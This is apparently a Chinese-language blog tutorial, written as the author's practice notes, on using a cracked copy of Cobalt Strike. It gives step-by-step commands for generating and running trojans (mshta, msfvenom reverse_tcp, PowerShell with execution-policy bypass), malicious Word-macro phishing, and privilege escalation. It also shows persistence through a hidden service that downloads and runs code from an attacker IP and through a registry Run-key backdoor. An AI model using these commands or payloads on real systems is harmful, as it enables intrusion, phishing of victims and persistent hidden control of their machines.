安装
百度的汉化破解版,源地址
下载下来可以看到有挺多文件,但我们只需要关注两个文件即可,start和teamserver
简单介绍下,Cobalt Strike是一款基于java的渗透测试工具,也就是经常在大佬文章中出现的称为CS的神器。它分为客户端和服务端,服务端的关键文件是teamserver和cobaltstrike.jar,而客户端只需在主机上执行start,然后连接服务端即可,通过这种模式,多个客户端可以连接到一个服务端,使得团队成员之间可以共享攻击资源与目标信息和sessions,提升效率。
这里演示下连接效果,以linux服务端为例(当然windows也可以,上面我们可以看到作者已经给我们创建好了bat文件)
查看本机ip地址,执行命令
1 | ./teamserver ip password #password自定义 |
客户端运行start.bat,填写相应连接信息
点击连接,成功上线
基本使用
已经是中文版,就方便很多了,这里实践一下百度的一些常用方法
上线肉鸡
创建监听器
Cobalt Strike–>监听器–>add–>save
生成木马
方式选择powershell
Generate生成
生成web链接
用刚刚生成的文件生成下载链接
运行木马
在目标主机上运行mshta命令。mshta.exe是微软Windows操作系统相关程序,用于执行.HTA文件。
回车,返回Cobalt Strike即可看见肉鸡成功上线
点击进入beacon使用shell+命令即可执行交互
这里借用一下大佬的命令表
1 | Beacon Commands |
socks代理
开启sock代理
主机配置proxychains.conf
nmap扫描内网存活主机
Metasploit联动
CS木马msf监听
msf开启监听
Cobalt Strike上创建两个监听器,windows/beacon_http/reverse_http来监听肉鸡,windows/foreign/reverse_http来将获取到的控制权传给msf(端口与msf监听的端口一致)
选择foreign监听器生成木马在主机上执行
主机上执行可以看到成功获取会话
但就像博主说的,会话极其不稳定,马上就断开了
msf生成木马CS监听
1 | msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.126.128 lport=6666 -f exe -o msf.exe |
cs生成链接
目标主机访问链接运行
返回msf可以看到已经获取会话
宏钓鱼
选择office方式
点击生成之后弹出提示框告诉我们步骤
首先随便打开一个word或者office,查看macros
随意命名,打开到this document,回到cs复制macro,粘贴
关闭另存为启用宏的word文档
目标主机打开这个带有恶意宏的文档即可上线
shellcode
CS支持生成多种语言的shellcode
比如powershell
将payload.ps1复制到目标系统并执行以下命令
1 | powershell –exec bypass –Command "& {Import-Module 'C:\payload.ps1'}" |
返回CS即可看到返回会话
提权
CS内置两个exp
通过项目可以导入脚本文件来扩展漏洞库,点击Cobalt Strike中的脚本管理器,点击load加载下来的cna文件
选择相应的exp即可尝试提权
权限维持
目的是即使目标主机重启,依旧能保持目标的控制权
设置服务后门
生成一个服务器的恶意脚本
复制生成的命令在目标主机上执行
返回同样上线主机,但只有普通用户的权限,因此想要完成以下的操作需要提权,我这里因为是虚拟机,直接管理员运行了
打开beacon shell并执行命令
1 | shell sc create "blacknight" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.183.148:80/a'))\"" |
执行成功,这时查看目标主机的服务信息发现一个名为blacknight的服务已经创建了
但还是手动的,因此我们需要把他设为自动
执行命令
1 | shell sc config "name" start= auto |
这是再返回主机查看可以看到已经变成自动的了
这样就设置好了一个服务后门。
设置注册表后门
首先在CS上生成一个恶意可执行文件上传到服务器上
右键打开文件管理
点击下方的upload将恶意文件上传到主机上
执行命令
1 | shell reg add HKLM_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "keyname" /t REG_SZ /d "C:\Users\15363\Desktop\artifact.exe" /f |
打开主机注册表编辑器可以看到已经写入成功
就跟着做到这里吧,总算是熟悉了一下会用了,以后有啥高级用法另开。